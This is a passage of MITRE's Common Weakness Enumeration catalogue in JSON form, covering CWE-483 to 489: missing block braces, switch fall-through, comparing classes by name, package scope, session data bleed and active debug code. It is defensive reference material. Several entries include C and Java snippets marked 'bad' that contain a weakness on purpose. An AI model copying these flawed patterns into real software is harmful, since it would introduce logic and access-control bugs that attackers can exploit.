Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Modes_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"483":{"attr":{"@_ID":"483","@_Name":"Incorrect Block Delimitation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code does not explicitly delimit a block that is intended to contain 2 or more statements, creating a logic error.","Extended_Description":"In some languages, braces (or other delimiters) are optional for blocks. When the delimiter is omitted, it is possible to insert a logic error in which a statement is thought to be in a block but is not. In some cases, the logic error can have security implications.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Alter Execution Logic","Note":"This is a general logic error which will often lead to obviously-incorrect behaviors that are quickly noticed and fixed. In lightly tested or untested code, this error may be introduced it into a production environment and provide additional attack vectors by creating a control flow path leading to an unexpected state in the application. The consequences will depend on the types of behaviors that are being incorrectly executed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Always use explicit block delimitation and use static-analysis technologies to enforce this practice."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In this example, the programmer has indented the statements to call Do_X() and Do_Y(), as if the intention is that these functions are only called when the condition is true. However, because there are no braces to signify the block, Do_Y() will always be executed, even if the condition is false.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (condition==true)","xhtml:div":{"#text":"Do_X();Do_Y();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"This might not be what the programmer intended. When the condition is critical for security, such as in making a security decision or detecting a critical error, this may produce a vulnerability."},{"Intro_Text":"In this example, the programmer has indented the Do_Y() statement as if the intention is that the function should be associated with the preceding conditional and should only be called when the condition is true. However, because Do_X() was called on the same line as the conditional and there are no braces to signify the block, Do_Y() will always be executed, even if the condition is false.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (condition==true) Do_X();","xhtml:div":{"#text":"Do_Y();","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"This might not be what the programmer intended. When the condition is critical for security, such as in making a security decision or detecting a critical error, this may produce a vulnerability."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-1266","Description":"incorrect indentation of \\"goto\\" statement makes it more difficult to detect an incorrect goto (Apple\'s \\"goto fail\\")","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Incorrect block delimitation"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Michael Koo and Paul Black","Contribution_Organization":"NIST","Contribution_Date":"2010-04-28","Contribution_Comment":"Correction to Demonstrative Examples"}}},"484":{"attr":{"@_ID":"484","@_Name":"Omitted Break Statement in Switch","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program omits a break statement within a switch or similar construct, causing code associated with multiple conditions to execute. This can cause problems when the programmer only intended to execute code associated with one condition.","Extended_Description":"This can lead to critical code executing in situations where it should not.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic","Note":"This weakness can cause unintended logic to be executed and other unexpected application behavior."}},"Detection_Methods":{"Detection_Method":[{"Method":"White Box","Description":"Omission of a break statement might be intentional, in order to support fallthrough. Automated detection methods might therefore be erroneous. Semantic understanding of expected program behavior is required to interpret whether the code is correct."},{"Method":"Black Box","Description":"Since this weakness is associated with a code construct, it would be indistinguishable from other errors that produce the same behavior."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Omitting a break statement so that one may fall through is often indistinguishable from an error, and therefore should be avoided. If you need to use fall-through capabilities, make sure that you have clearly documented this within the switch statement, and ensure that you have examined all the logical possibilities."},{"Phase":"Implementation","Description":"The functionality of omitting a break statement could be clarified with an if statement. This method is much safer."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In both of these examples, a message is printed based on the month passed into the function:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void printMessage(int month){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch (month) {}println(\\" is a great month\\");","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case 1: print(\\"January\\");case 2: print(\\"February\\");case 3: print(\\"March\\");case 4: print(\\"April\\");case 5: print(\\"May\\");case 6: print(\\"June\\");case 7: print(\\"July\\");case 8: print(\\"August\\");case 9: print(\\"September\\");case 10: print(\\"October\\");case 11: print(\\"November\\");case 12: print(\\"December\\");","xhtml:br":["","","","","","","","","","","",""]}},"xhtml:br":""}}}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void printMessage(int month){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch (month) {}printf(\\" is a great month\\");","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case 1: printf(\\"January\\");case 2: printf(\\"February\\");case 3: printf(\\"March\\");case 4: printf(\\"April\\");case 5: printff(\\"May\\");case 6: printf(\\"June\\");case 7: printf(\\"July\\");case 8: printf(\\"August\\");case 9: printf(\\"September\\");case 10: printf(\\"October\\");case 11: printf(\\"November\\");case 12: printf(\\"December\\");","xhtml:br":["","","","","","","","","","","",""]}},"xhtml:br":""}}}}],"Body_Text":"Both examples do not use a break statement after each case, which leads to unintended fall-through behavior. For example, calling \\"printMessage(10)\\" will result in the text \\"OctoberNovemberDecember is a great month\\" being printed."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Omitted break statement"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Switch Statements&#34;, Page 337"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Detection_Factors, Name, Other_Notes, Potential_Mitigations, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Omitted Break Statement","attr":{"@_Date":"2008-11-24"}}}},"486":{"attr":{"@_ID":"486","@_Name":"Comparison of Classes by Name","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program compares classes by name, which can cause it to use the wrong class when multiple classes can have the same name.","Extended_Description":"If the decision to trust the methods and data of an object is based on the name of a class, it is possible for malicious users to send objects of the same name as trusted classes and thereby gain the trust afforded to known classes and types.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1025","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If a program relies solely on the name of an object to determine identity, it may execute the incorrect or unintended code."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use class equivalency to determine type. Rather than use the class name to determine if an object is of a given type, use the getClass() method, and == operator."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In this example, the expression in the if statement compares the class of the inputClass object to a trusted class by comparing the class names.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"if (inputClass.getClass().getName().equals(\\"TrustedClassName\\")) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","",""],"xhtml:i":["// Do something assuming you trust inputClass","// ..."]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"if (inputClass.getClass() == TrustedClass.class) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","",""],"xhtml:i":["// Do something assuming you trust inputClass","// ..."]}}}}],"Body_Text":"However, multiple classes can have the same name therefore comparing an object\'s class by name can allow untrusted classes of the same name as the trusted class to be use to execute unintended or incorrect code. To compare the class of an object to the intended class the getClass() method and the comparison operator \\"==\\" should be used to ensure the correct trusted class is used, as shown in the following example."},{"Intro_Text":"In this example, the Java class, TrustedClass, overrides the equals method of the parent class Object to determine equivalence of objects of the class. The overridden equals method first determines if the object, obj, is the same class as the TrustedClass object and then compares the object\'s fields to determine if the objects are equivalent.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class TrustedClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...@Overridepublic boolean equals(Object obj) {}...","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean isEquals = false;if (obj.getClass().getName().equals(this.getClass().getName())) {}return isEquals;","xhtml:br":["","","","",""],"xhtml:i":"// first check to see if the object is of the same class","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...if (...) {}","xhtml:br":["","",""],"xhtml:i":"// then compare object fields","xhtml:div":{"#text":"isEquals = true;","attr":{"@_style":"margin-left:10px;"}}}}}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public boolean equals(Object obj) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...if (obj.getClass() == this.getClass()) {}...","xhtml:br":["","","","",""],"xhtml:i":"// first check to see if the object is of the same class","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}}}],"Body_Text":"However, the equals method compares the class names of the object, obj, and the TrustedClass object to determine if they are the same class. As with the previous example using the name of the class to compare the class of objects can lead to the execution of unintended or incorrect code if the object passed to the equals method is of another class with the same name. To compare the class of an object to the intended class, the getClass() method and the comparison operator \\"==\\" should be used to ensure the correct trusted class is used, as shown in the following example."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Comparing Classes by Name"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Comparing classes by name"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ09-J","Entry_Name":"Compare classes and not class names"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Comparing Classes by Name","attr":{"@_Date":"2008-04-11"}}}},"487":{"attr":{"@_ID":"487","@_Name":"Reliance on Package-level Scope","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Java packages are not inherently closed; therefore, relying on them for code security is not a good practice.","Extended_Description":"The purpose of package scope is to prevent accidental access by other parts of a program. This is an ease-of-software-development feature but not a security feature.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Any data in a Java package can be accessed outside of the Java framework if the package is distributed."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The data in a Java class can be modified by anyone outside of the Java framework if the packages is distributed."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Data should be private static and final whenever possible. This will assure that your code is protected by instantiating early, preventing access and tampering."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"package math;public class Lebesgue implements Integration{}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public final Static String youAreHidingThisFunction(functionToIntegrate){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return ...;","xhtml:br":""}}}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Relying on package-level scope"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET04-J","Entry_Name":"Do not increase the accessibility of overridden or hidden methods"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Type"}],"Previous_Entry_Name":{"#text":"Relying on Package-level Scope","attr":{"@_Date":"2008-04-11"}}}},"488":{"attr":{"@_ID":"488","@_Name":"Exposure of Data Element to Wrong Session","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not sufficiently enforce boundaries between the states of different sessions, causing data to be provided to, or used by, the wrong session.","Extended_Description":{"xhtml:p":["Data can \\"bleed\\" from one session to another through member variables of singleton objects, such as Servlets, and objects from a shared pool.","In the case of Servlets, developers sometimes do not understand that, unless a Servlet implements the SingleThreadModel interface, the Servlet is a singleton; there is only one instance of the Servlet, and that single instance is used and re-used to handle multiple requests that are processed simultaneously by different threads. A common result is that developers use Servlet member fields in such a way that one user may inadvertently see another user\'s data. In other words, storing user data in Servlet member fields introduces a data access race condition."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Protect the application\'s sessions from information leakage. Make sure that a session\'s data is not used or visible by other sessions."},{"Phase":"Testing","Description":"Use a static analysis tool to scan the code for information leakage vulnerabilities (e.g. Singleton Member Field)."},{"Phase":"Architecture and Design","Description":"In a multithreading environment, storing user data in Servlet member fields introduces a data access race condition. Do not use member fields to store information in the Servlet."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Servlet stores the value of a request parameter in a member field and then later echoes the parameter value to the response output stream.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class GuestBook extends HttpServlet {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String name;protected void doPost (HttpServletRequest req, HttpServletResponse res) {}","xhtml:br":["",""],"xhtml:div":{"#text":"name = req.getParameter(\\"name\\");...out.println(name + \\", thanks for visiting!\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},"Body_Text":"While this code will work perfectly in a single-user environment, if two users access the Servlet at approximately the same time, it is possible for the two request handler threads to interleave in the following way: Thread 1: assign \\"Dick\\" to name Thread 2: assign \\"Jane\\" to name Thread 1: print \\"Jane, thanks for visiting!\\" Thread 2: print \\"Jane, thanks for visiting!\\" Thereby showing the first user the second user\'s name."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Data Leaking Between Users"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Data Leaking Between Users","attr":{"@_Date":"2008-04-11"}},{"#text":"Data Leak Between Sessions","attr":{"@_Date":"2011-03-29"}}]}},"489":{"attr":{"@_ID":"489","@_Name":"Active Debug Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application is deployed to unauthorized actors with debugging code still enabled or active, which can create unintended entry points or expose sensitive information.","Extended_Description":"A common development practice is to add \\"back door\\" code specifically designed for debugging or testing purposes that is not intended to be shipped or deployed with the application. These back door entry points create security risks because they are not considered during design or testing and fall outside of the expected operating conditions of the application.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"215","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Leftover debug code","Description":"This term originates from Seven Pernicious Kingdoms"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"In web-based applications, debug code is used to test and modify web application properties, configuration information, and functions. If a debug application is left on a production server, this oversight during the \\"software process\\" allows attackers access to debug functionality."},{"Phase":"Build and Compilation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Other"],"Impact":["Bypass Protection Mechanism","Read Application Data","Gain 